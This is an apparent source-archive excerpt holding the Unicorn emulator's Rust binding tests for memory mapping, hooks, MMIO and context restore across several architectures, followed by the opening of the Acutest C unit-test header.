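    // because no region covers 0x1000 yet; after the mem_map call that
    // follows, the identical write succeeds.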
assert_eq!( emu.mem_write(0x1000, &x86_code32), (Err(uc_error::WRITE_UNMAPPED)) ); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); assert_eq!( emu.mem_read_as_vec(0x1000, x86_code32.len()), Ok(x86_code32.clone()) ); assert_eq!(emu.reg_write(RegisterX86::ECX, 10), Ok(())); assert_eq!(emu.reg_write(RegisterX86::EDX, 50), Ok(())); assert_eq!( emu.emu_start( 0x1000, (0x1000 + x86_code32.len()) as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(emu.reg_read(RegisterX86::ECX), Ok(11)); assert_eq!(emu.reg_read(RegisterX86::EDX), Ok(49)); } #[test] fn x86_code_callback() { #[derive(PartialEq, Debug)] struct CodeExpectation(u64, u32); let expects = vec![CodeExpectation(0x1000, 1), CodeExpectation(0x1001, 1)]; let codes: Vec<CodeExpectation> = Vec::new(); let codes_cell = Rc::new(RefCell::new(codes)); let callback_codes = codes_cell.clone(); let callback = move |_: &mut Unicorn<'_, ()>, address: u64, size: u32| { let mut codes = callback_codes.borrow_mut(); codes.push(CodeExpectation(address, size)); }; let x86_code32: Vec<u8> = vec![0x41, 0x4a]; // INC ecx; DEC edx let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); let hook = emu .add_code_hook(0x1000, 0x2000, callback) .expect("failed to add code hook"); assert_eq!( emu.emu_start(0x1000, 0x1002, 10 * SECOND_SCALE, 1000), Ok(()) ); assert_eq!(expects, *codes_cell.borrow()); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_intr_callback() { #[derive(PartialEq, Debug)] struct IntrExpectation(u32); let expect = IntrExpectation(0x80); let intr_cell = Rc::new(RefCell::new(IntrExpectation(0))); let callback_intr = intr_cell.clone(); let callback = move |_: &mut Unicorn<'_, ()>, intno: u32| { *callback_intr.borrow_mut() = IntrExpectation(intno); }; let x86_code32: Vec<u8> = vec![0xcd, 0x80]; // INT 0x80; let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); let hook = emu .add_intr_hook(callback) .expect("failed to add intr hook"); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code32.len() as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(expect, *intr_cell.borrow()); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_mem_callback() { #[derive(PartialEq, Debug)] struct MemExpectation(MemType, u64, usize, i64); let expects = vec![ MemExpectation(MemType::WRITE, 0x2000, 4, 0xdeadbeef), MemExpectation(MemType::READ_UNMAPPED, 0x10000, 4, 0), MemExpectation(MemType::READ, 0x10000, 4, 0), ]; let mems: Vec<MemExpectation> = Vec::new(); let mems_cell = Rc::new(RefCell::new(mems)); let callback_mems = mems_cell.clone(); let callback = move |uc: &mut Unicorn<'_, ()>, mem_type: MemType, address: u64, size: usize, value: i64| { let mut mems = callback_mems.borrow_mut(); mems.push(MemExpectation(mem_type, address, size, value)); if mem_type == MemType::READ_UNMAPPED { uc.mem_map(address, 0x1000, Permission::ALL).unwrap(); } true }; // mov eax, 0xdeadbeef; // mov [0x2000], eax; // mov eax, [0x10000]; let x86_code32: Vec<u8> = vec![ 0xB8, 0xEF, 0xBE, 0xAD, 0xDE, 0xA3, 0x00, 0x20, 0x00, 0x00, 0xA1, 0x00, 0x00, 0x01, 0x00, ]; let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) 
.expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); let hook = emu .add_mem_hook(HookType::MEM_ALL, 0, u64::MAX, callback) .expect("failed to add memory hook"); assert_eq!(emu.reg_write(RegisterX86::EAX, 0x123), Ok(())); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code32.len() as u64, 10 * SECOND_SCALE, 0x1000 ), Ok(()) ); assert_eq!(expects, *mems_cell.borrow()); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_insn_in_callback() { #[derive(PartialEq, Debug)] struct InsnInExpectation(u32, usize); let expect = InsnInExpectation(0x10, 4); let insn_cell = Rc::new(RefCell::new(InsnInExpectation(0, 0))); let callback_insn = insn_cell.clone(); let callback = move |_: &mut Unicorn<()>, port: u32, size: usize| { *callback_insn.borrow_mut() = InsnInExpectation(port, size); 42 }; let x86_code32: Vec<u8> = vec![0xe5, 0x10]; // IN eax, 0x10; let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); let hook = emu .add_insn_in_hook(callback) .expect("failed to add in hook"); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code32.len() as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(expect, *insn_cell.borrow()); assert_eq!(emu.reg_read(RegisterX86::EAX), Ok(42)); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_insn_out_callback() { #[derive(PartialEq, Debug)] struct InsnOutExpectation(u32, usize, u32); let expect = InsnOutExpectation(0x46, 1, 0x32); let insn_cell = Rc::new(RefCell::new(InsnOutExpectation(0, 0, 0))); let callback_insn = insn_cell.clone(); let callback = move |_: &mut Unicorn<'_, ()>, port: u32, size: usize, value: u32| { *callback_insn.borrow_mut() = InsnOutExpectation(port, size, value); }; let x86_code32: Vec<u8> = vec![0xb0, 0x32, 0xe6, 0x46]; // MOV al, 0x32; OUT 0x46, al; let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); let hook = emu .add_insn_out_hook(callback) .expect("failed to add out hook"); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code32.len() as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(expect, *insn_cell.borrow()); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_insn_sys_callback() { #[derive(PartialEq, Debug)] struct InsnSysExpectation(u64); let expect = InsnSysExpectation(0xdeadbeef); let insn_cell = Rc::new(RefCell::new(InsnSysExpectation(0))); let callback_insn = insn_cell.clone(); let callback = move |uc: &mut Unicorn<'_, ()>| { println!("!!!!"); let rax = uc.reg_read(RegisterX86::RAX).unwrap(); *callback_insn.borrow_mut() = InsnSysExpectation(rax); }; // MOV rax, 0xdeadbeef; SYSCALL; let x86_code: Vec<u8> = vec![ 0x48, 0xB8, 0xEF, 0xBE, 0xAD, 0xDE, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x05, ]; let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_64) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code), Ok(())); let hook = emu .add_insn_sys_hook(InsnSysX86::SYSCALL, 1, 0, callback) .expect("failed to add syscall hook"); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code.len() as u64, 10 * SECOND_SCALE, 1000 
), Ok(()) ); assert_eq!(expect, *insn_cell.borrow()); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_mmio() { #[derive(PartialEq, Debug)] struct MmioReadExpectation(u64, usize); #[derive(PartialEq, Debug)] struct MmioWriteExpectation(u64, usize, u64); let read_expect = MmioReadExpectation(4, 4); let write_expect = MmioWriteExpectation(8, 2, 42); let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_64) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x1000, Permission::ALL), Ok(())); { // MOV eax, [0x2004]; MOV [0x2008], ax; let x86_code: Vec<u8> = vec![ 0x8B, 0x04, 0x25, 0x04, 0x20, 0x00, 0x00, 0x66, 0x89, 0x04, 0x25, 0x08, 0x20, 0x00, 0x00, ]; let read_cell = Rc::new(RefCell::new(MmioReadExpectation(0, 0))); let cb_read_cell = read_cell.clone(); let read_callback = move |_: &mut Unicorn<'_, ()>, offset, size| { *cb_read_cell.borrow_mut() = MmioReadExpectation(offset, size); 42 }; let write_cell = Rc::new(RefCell::new(MmioWriteExpectation(0, 0, 0))); let cb_write_cell = write_cell.clone(); let write_callback = move |_: &mut Unicorn<'_, ()>, offset, size, value| { *cb_write_cell.borrow_mut() = MmioWriteExpectation(offset, size, value); }; assert_eq!(emu.mem_write(0x1000, &x86_code), Ok(())); assert_eq!( emu.mmio_map(0x2000, 0x1000, Some(read_callback), Some(write_callback)), Ok(()) ); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code.len() as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(read_expect, *read_cell.borrow()); assert_eq!(write_expect, *write_cell.borrow()); assert_eq!(emu.mem_unmap(0x2000, 0x1000), Ok(())); } { // MOV eax, [0x2004]; let x86_code: Vec<u8> = vec![0x8B, 0x04, 0x25, 0x04, 0x20, 0x00, 0x00]; let read_cell = Rc::new(RefCell::new(MmioReadExpectation(0, 0))); let cb_read_cell = read_cell.clone(); let read_callback = move |_: &mut Unicorn<'_, ()>, offset, size| { *cb_read_cell.borrow_mut() = MmioReadExpectation(offset, size); 42 }; assert_eq!(emu.mem_write(0x1000, &x86_code), Ok(())); assert_eq!(emu.mmio_map_ro(0x2000, 0x1000, read_callback), Ok(())); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code.len() as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(read_expect, *read_cell.borrow()); assert_eq!(emu.mem_unmap(0x2000, 0x1000), Ok(())); } { // MOV ax, 42; MOV [0x2008], ax; let x86_code: Vec<u8> = vec![ 0x66, 0xB8, 0x2A, 0x00, 0x66, 0x89, 0x04, 0x25, 0x08, 0x20, 0x00, 0x00, ]; let write_cell = Rc::new(RefCell::new(MmioWriteExpectation(0, 0, 0))); let cb_write_cell = write_cell.clone(); let write_callback = move |_: &mut Unicorn<'_, ()>, offset, size, value| { *cb_write_cell.borrow_mut() = MmioWriteExpectation(offset, size, value); }; assert_eq!(emu.mem_write(0x1000, &x86_code), Ok(())); assert_eq!(emu.mmio_map_wo(0x2000, 0x1000, write_callback), Ok(())); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code.len() as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(write_expect, *write_cell.borrow()); assert_eq!(emu.mem_unmap(0x2000, 0x1000), Ok(())); } } #[test] fn emulate_arm() { let arm_code32: Vec<u8> = vec![0x83, 0xb0]; // sub sp, #0xc let mut emu = unicorn_engine::Unicorn::new(Arch::ARM, Mode::THUMB) .expect("failed to initialize unicorn instance"); assert_eq!(emu.reg_write(RegisterARM::R1, 123), Ok(())); assert_eq!(emu.reg_read(RegisterARM::R1), Ok(123)); // Attempt to write to memory before mapping it. 
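    // As in emulate_x86 above, this write is expected to fail with
    // WRITE_UNMAPPED until the page is mapped.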
assert_eq!( emu.mem_write(0x1000, &arm_code32), (Err(uc_error::WRITE_UNMAPPED)) ); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &arm_code32), Ok(())); assert_eq!( emu.mem_read_as_vec(0x1000, arm_code32.len()), Ok(arm_code32.clone()) ); assert_eq!(emu.reg_write(RegisterARM::SP, 12), Ok(())); assert_eq!(emu.reg_write(RegisterARM::R0, 10), Ok(())); // ARM checks the least significant bit of the address to know // if the code is in Thumb mode. assert_eq!( emu.emu_start( 0x1000 | 0x01, (0x1000 | (0x01 + arm_code32.len())) as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(emu.reg_read(RegisterARM::SP), Ok(0)); assert_eq!(emu.reg_read(RegisterARM::R0), Ok(10)); } #[test] fn emulate_mips() { let mips_code32 = vec![0x56, 0x34, 0x21, 0x34]; // ori $at, $at, 0x3456; let mut emu = unicorn_engine::Unicorn::new(Arch::MIPS, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &mips_code32), Ok(())); assert_eq!( emu.mem_read_as_vec(0x1000, mips_code32.len()), Ok(mips_code32.clone()) ); assert_eq!(emu.reg_write(RegisterMIPS::AT, 0), Ok(())); assert_eq!( emu.emu_start( 0x1000, (0x1000 + mips_code32.len()) as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(emu.reg_read(RegisterMIPS::AT), Ok(0x3456)); } #[test] fn emulate_ppc() { let ppc_code32 = vec![0x7F, 0x46, 0x1A, 0x14]; // add 26, 6, 3 let mut emu = unicorn_engine::Unicorn::new(Arch::PPC, Mode::PPC32 | Mode::BIG_ENDIAN) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &ppc_code32), Ok(())); assert_eq!( emu.mem_read_as_vec(0x1000, ppc_code32.len()), Ok(ppc_code32.clone()) ); assert_eq!(emu.reg_write(RegisterPPC::R3, 42), Ok(())); assert_eq!(emu.reg_write(RegisterPPC::R6, 1337), Ok(())); assert_eq!( emu.emu_start( 0x1000, (0x1000 + ppc_code32.len()) as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(emu.reg_read(RegisterPPC::R26), Ok(1379)); } #[test] fn mem_unmapping() { let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_unmap(0x1000, 0x4000), Ok(())); } #[test] fn mem_map_ptr() { // Use an array for the emulator memory. let mut mem: [u8; 4000] = [0; 4000]; let x86_code32: Vec<u8> = vec![0x41, 0x4a]; // INC ecx; DEC edx let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); // Attempt to write to memory before mapping it. assert_eq!( emu.mem_write(0x1000, &x86_code32), (Err(uc_error::WRITE_UNMAPPED)) ); assert_eq!( unsafe { emu.mem_map_ptr(0x1000, 0x4000, Permission::ALL, mem.as_mut_ptr() as _) }, Ok(()) ); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); assert_eq!( emu.mem_read_as_vec(0x1000, x86_code32.len()), Ok(x86_code32.clone()) ); assert_eq!(emu.reg_write(RegisterX86::ECX, 10), Ok(())); assert_eq!(emu.reg_write(RegisterX86::EDX, 50), Ok(())); assert_eq!( emu.emu_start( 0x1000, (0x1000 + x86_code32.len()) as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(emu.reg_read(RegisterX86::ECX), Ok(11)); assert_eq!(emu.reg_read(RegisterX86::EDX), Ok(49)); assert_eq!(emu.mem_unmap(0x1000, 0x4000), Ok(())); // Use a Vec for the emulator memory. let mut mem: Vec<u8> = Vec::new(); mem.reserve(4000); // Attempt to write to memory before mapping it. 
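    // The mapping created below uses mem_map_ptr, which is unsafe: Unicorn
    // reads and writes through the raw host pointer, so the backing buffer
    // must outlive the mapping (and must not move) until mem_unmap is called.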
assert_eq!( emu.mem_write(0x1000, &x86_code32), (Err(uc_error::WRITE_UNMAPPED)) ); assert_eq!( unsafe { emu.mem_map_ptr(0x1000, 0x4000, Permission::ALL, mem.as_mut_ptr() as _) }, Ok(()) ); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); assert_eq!( emu.mem_read_as_vec(0x1000, x86_code32.len()), Ok(x86_code32.clone()) ); assert_eq!(emu.reg_write(RegisterX86::ECX, 10), Ok(())); assert_eq!(emu.reg_write(RegisterX86::EDX, 50), Ok(())); assert_eq!( emu.emu_start( 0x1000, (0x1000 + x86_code32.len()) as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(emu.reg_read(RegisterX86::ECX), Ok(11)); assert_eq!(emu.reg_read(RegisterX86::EDX), Ok(49)); assert_eq!(emu.mem_unmap(0x1000, 0x4000), Ok(())); } #[test] fn x86_context_save_and_restore() { for mode in [Mode::MODE_32, Mode::MODE_64] { let x86_code = [ 0x48, 0xB8, 0xEF, 0xBE, 0xAD, 0xDE, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x05, ]; let mut emu = unicorn_engine::Unicorn::new(Arch::X86, mode) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code), Ok(())); let _ = emu.emu_start( 0x1000, (0x1000 + x86_code.len()) as u64, 10 * SECOND_SCALE, 1000, ); /* now, save the context... */ let context = emu.context_init(); let context = context.unwrap(); /* and create a new emulator, into which we will "restore" that context */ let emu2 = unicorn_engine::Unicorn::new(Arch::X86, mode) .expect("failed to initialize unicorn instance"); assert_eq!(emu2.context_restore(&context), Ok(())); for register in X86_REGISTERS.iter() { println!("Testing register {:?}", register); assert_eq!(emu2.reg_read(*register), emu.reg_read(*register)); } } } #[test] fn x86_block_callback() { #[derive(PartialEq, Debug)] struct BlockExpectation(u64, u32); let expects = vec![BlockExpectation(0x1000, 2)]; let blocks: Vec<BlockExpectation> = Vec::new(); let blocks_cell = Rc::new(RefCell::new(blocks)); let callback_blocks = blocks_cell.clone(); let callback = move |_: &mut Unicorn<'_, ()>, address: u64, size: u32| { let mut blocks = callback_blocks.borrow_mut(); blocks.push(BlockExpectation(address, size)); }; let x86_code32: Vec<u8> = vec![0x41, 0x4a]; // INC ecx; DEC edx let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); let hook = emu .add_block_hook(1, 0, callback) .expect("failed to add block hook"); assert_eq!( emu.emu_start(0x1000, 0x1002, 10 * SECOND_SCALE, 1000), Ok(()) ); assert_eq!(expects, *blocks_cell.borrow()); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_tlb_callback() { #[derive(PartialEq, Debug)] struct BlockExpectation(u64, u32); let expects:u64 = 4; let count: u64 = 0; let count_cell = Rc::new(RefCell::new(count)); let callback_counter = count_cell.clone(); let tlb_callback = move |_: &mut Unicorn<'_, ()>, address: u64, _: MemType| -> Option<TlbEntry> { let mut blocks = callback_counter.borrow_mut(); *blocks += 1; return Some(TlbEntry{paddr: address, perms: Permission::ALL}); }; let syscall_callback = move |uc: &mut Unicorn<'_, ()>| { assert_eq!(uc.ctl_flush_tlb(), Ok(())); }; let code: Vec<u8> = vec![0xa3,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x0f,0x05,0xa3,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x00]; // movabs dword ptr [0x200000], eax; syscall; movabs dword ptr [0x200000], eax let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_64) .expect("failed to 
initialize unicorn instance"); assert_eq!(emu.ctl_tlb_type(TlbType::VIRTUAL), Ok(())); assert_eq!(emu.mem_map(0x1000, 0x1000, Permission::ALL), Ok(())); assert_eq!(emu.mem_map(0x200000, 0x1000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &code), Ok(())); let tlb_hook = emu .add_tlb_hook(0, !0u64, tlb_callback) .expect("failed to add tlb hook"); let syscall_hook = emu .add_insn_sys_hook(InsnSysX86::SYSCALL, 0, !0u64, syscall_callback) .expect("failed to add syscall hook"); assert_eq!( emu.emu_start(0x1000, (0x1000 + code.len()) as u64, 0, 0), Ok(()) ); assert_eq!(expects, *count_cell.borrow()); assert_eq!(emu.remove_hook(tlb_hook), Ok(())); assert_eq!(emu.remove_hook(syscall_hook), Ok(())); } �����������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/���������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015325�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/acutest.h������������������������������������������������������������������0000664�0000000�0000000�00000172060�14675241067�0017154�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Acutest -- Another C/C++ Unit Test facility * <https://github.com/mity/acutest> * * Copyright 2013-2020 Martin Mitas * Copyright 2019 Garrett D'Amore * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the "Software"), * to deal in the Software without restriction, including without limitation * the rights to use, copy, modify, merge, publish, distribute, sublicense, * and/or sell copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS * IN THE SOFTWARE. */ #ifndef ACUTEST_H #define ACUTEST_H /************************ *** Public interface *** ************************/ /* By default, "acutest.h" provides the main program entry point (function * main()). However, if the test suite is composed of multiple source files * which include "acutest.h", then this causes a problem of multiple main() * definitions. To avoid this problem, #define macro TEST_NO_MAIN in all * compilation units but one. */ /* Macro to specify list of unit tests in the suite. 
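 * (Defining TEST_LIST is mandatory: it is what defines the acutest_list_
 * array the runner iterates over, so omitting it fails at link time.)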
* The unit test implementation MUST provide list of unit tests it implements * with this macro: * * TEST_LIST = { * { "test1_name", test1_func_ptr }, * { "test2_name", test2_func_ptr }, * ... * { NULL, NULL } // zeroed record marking the end of the list * }; * * The list specifies names of each test (must be unique) and pointer to * a function implementing it. The function does not take any arguments * and has no return values, i.e. every test function has to be compatible * with this prototype: * * void test_func(void); * * Note the list has to be ended with a zeroed record. */ #define TEST_LIST const struct acutest_test_ acutest_list_[] /* Macros for testing whether an unit test succeeds or fails. These macros * can be used arbitrarily in functions implementing the unit tests. * * If any condition fails throughout execution of a test, the test fails. * * TEST_CHECK takes only one argument (the condition), TEST_CHECK_ allows * also to specify an error message to print out if the condition fails. * (It expects printf-like format string and its parameters). The macros * return non-zero (condition passes) or 0 (condition fails). * * That can be useful when more conditions should be checked only if some * preceding condition passes, as illustrated in this code snippet: * * SomeStruct* ptr = allocate_some_struct(); * if(TEST_CHECK(ptr != NULL)) { * TEST_CHECK(ptr->member1 < 100); * TEST_CHECK(ptr->member2 > 200); * } */ #define TEST_CHECK_(cond, ...) \ acutest_check_((cond), __FILE__, __LINE__, __VA_ARGS__) #define TEST_CHECK(cond) acutest_check_((cond), __FILE__, __LINE__, "%s", #cond) /* These macros are the same as TEST_CHECK_ and TEST_CHECK except that if the * condition fails, the currently executed unit test is immediately aborted. * * That is done either by calling abort() if the unit test is executed as a * child process; or via longjmp() if the unit test is executed within the * main Acutest process. * * As a side effect of such abortion, your unit tests may cause memory leaks, * unflushed file descriptors, and other phenomena caused by the abortion. * * Therefore you should not use these as a general replacement for TEST_CHECK. * Use it with some caution, especially if your test causes some other side * effects to the outside world (e.g. communicating with some server, inserting * into a database etc.). */ #define TEST_ASSERT_(cond, ...) \ do { \ if (!acutest_check_((cond), __FILE__, __LINE__, __VA_ARGS__)) \ acutest_abort_(); \ } while (0) #define TEST_ASSERT(cond) \ do { \ if (!acutest_check_((cond), __FILE__, __LINE__, "%s", #cond)) \ acutest_abort_(); \ } while (0) #ifdef __cplusplus /* Macros to verify that the code (the 1st argument) throws exception of given * type (the 2nd argument). (Note these macros are only available in C++.) * * TEST_EXCEPTION_ is like TEST_EXCEPTION but accepts custom printf-like * message. * * For example: * * TEST_EXCEPTION(function_that_throw(), ExpectedExceptionType); * * If the function_that_throw() throws ExpectedExceptionType, the check passes. * If the function throws anything incompatible with ExpectedExceptionType * (or if it does not thrown an exception at all), the check fails. */ #define TEST_EXCEPTION(code, exctype) \ do { \ bool exc_ok_ = false; \ const char *msg_ = NULL; \ try { \ code; \ msg_ = "No exception thrown."; \ } catch (exctype const &) { \ exc_ok_ = true; \ } catch (...) 
{ \ msg_ = "Unexpected exception thrown."; \ } \ acutest_check_(exc_ok_, __FILE__, __LINE__, \ #code " throws " #exctype); \ if (msg_ != NULL) \ acutest_message_("%s", msg_); \ } while (0) #define TEST_EXCEPTION_(code, exctype, ...) \ do { \ bool exc_ok_ = false; \ const char *msg_ = NULL; \ try { \ code; \ msg_ = "No exception thrown."; \ } catch (exctype const &) { \ exc_ok_ = true; \ } catch (...) { \ msg_ = "Unexpected exception thrown."; \ } \ acutest_check_(exc_ok_, __FILE__, __LINE__, __VA_ARGS__); \ if (msg_ != NULL) \ acutest_message_("%s", msg_); \ } while (0) #endif /* #ifdef __cplusplus */ /* Sometimes it is useful to split execution of more complex unit tests to some * smaller parts and associate those parts with some names. * * This is especially handy if the given unit test is implemented as a loop * over some vector of multiple testing inputs. Using these macros allow to use * sort of subtitle for each iteration of the loop (e.g. outputting the input * itself or a name associated to it), so that if any TEST_CHECK condition * fails in the loop, it can be easily seen which iteration triggers the * failure, without the need to manually output the iteration-specific data in * every single TEST_CHECK inside the loop body. * * TEST_CASE allows to specify only single string as the name of the case, * TEST_CASE_ provides all the power of printf-like string formatting. * * Note that the test cases cannot be nested. Starting a new test case ends * implicitly the previous one. To end the test case explicitly (e.g. to end * the last test case after exiting the loop), you may use TEST_CASE(NULL). */ #define TEST_CASE_(...) acutest_case_(__VA_ARGS__) #define TEST_CASE(name) acutest_case_("%s", name) /* Maximal output per TEST_CASE call. Longer messages are cut. * You may define another limit prior including "acutest.h" */ #ifndef TEST_CASE_MAXSIZE #define TEST_CASE_MAXSIZE 64 #endif /* printf-like macro for outputting an extra information about a failure. * * Intended use is to output some computed output versus the expected value, * e.g. like this: * * if(!TEST_CHECK(produced == expected)) { * TEST_MSG("Expected: %d", expected); * TEST_MSG("Produced: %d", produced); * } * * Note the message is only written down if the most recent use of any checking * macro (like e.g. TEST_CHECK or TEST_EXCEPTION) in the current test failed. * This means the above is equivalent to just this: * * TEST_CHECK(produced == expected); * TEST_MSG("Expected: %d", expected); * TEST_MSG("Produced: %d", produced); * * The macro can deal with multi-line output fairly well. It also automatically * adds a final new-line if there is none present. */ #define TEST_MSG(...) acutest_message_(__VA_ARGS__) /* Maximal output per TEST_MSG call. Longer messages are cut. * You may define another limit prior including "acutest.h" */ #ifndef TEST_MSG_MAXSIZE #define TEST_MSG_MAXSIZE 1024 #endif /* Macro for dumping a block of memory. * * Its intended use is very similar to what TEST_MSG is for, but instead of * generating any printf-like message, this is for dumping raw block of a * memory in a hexadecimal form: * * TEST_CHECK(size_produced == size_expected && * memcmp(addr_produced, addr_expected, size_produced) == 0); * TEST_DUMP("Expected:", addr_expected, size_expected); * TEST_DUMP("Produced:", addr_produced, size_produced); */ #define TEST_DUMP(title, addr, size) acutest_dump_(title, addr, size) /* Maximal output per TEST_DUMP call (in bytes to dump). Longer blocks are cut. 
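 * (Truncated dumps end with a "... (and more N bytes)" note.)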
* You may define another limit prior including "acutest.h" */ #ifndef TEST_DUMP_MAXSIZE #define TEST_DUMP_MAXSIZE 1024 #endif /* Common test initialiation/clean-up * * In some test suites, it may be needed to perform some sort of the same * initialization and/or clean-up in all the tests. * * Such test suites may use macros TEST_INIT and/or TEST_FINI prior including * this header. The expansion of the macro is then used as a body of helper * function called just before executing every single (TEST_INIT) or just after * it ends (TEST_FINI). * * Examples of various ways how to use the macro TEST_INIT: * * #define TEST_INIT my_init_func(); * #define TEST_INIT my_init_func() // Works even without the * semicolon #define TEST_INIT setlocale(LC_ALL, NULL); #define TEST_INIT * { setlocale(LC_ALL, NULL); my_init_func(); } * * TEST_FINI is to be used in the same way. */ /********************** *** Implementation *** **********************/ /* The unit test files should not rely on anything below. */ #include <ctype.h> #include <stdarg.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <setjmp.h> #if defined(unix) || defined(__unix__) || defined(__unix) || \ defined(__APPLE__) || defined(__HAIKU__) #define ACUTEST_UNIX_ 1 #include <errno.h> #include <libgen.h> #include <unistd.h> #include <sys/types.h> #include <sys/wait.h> #include <signal.h> #include <time.h> #if defined CLOCK_PROCESS_CPUTIME_ID && defined CLOCK_MONOTONIC #define ACUTEST_HAS_POSIX_TIMER_ 1 #endif #endif #if defined(_gnu_linux_) || defined(__linux__) #define ACUTEST_LINUX_ 1 #include <fcntl.h> #include <sys/stat.h> #endif #if defined(_WIN32) || defined(__WIN32__) || 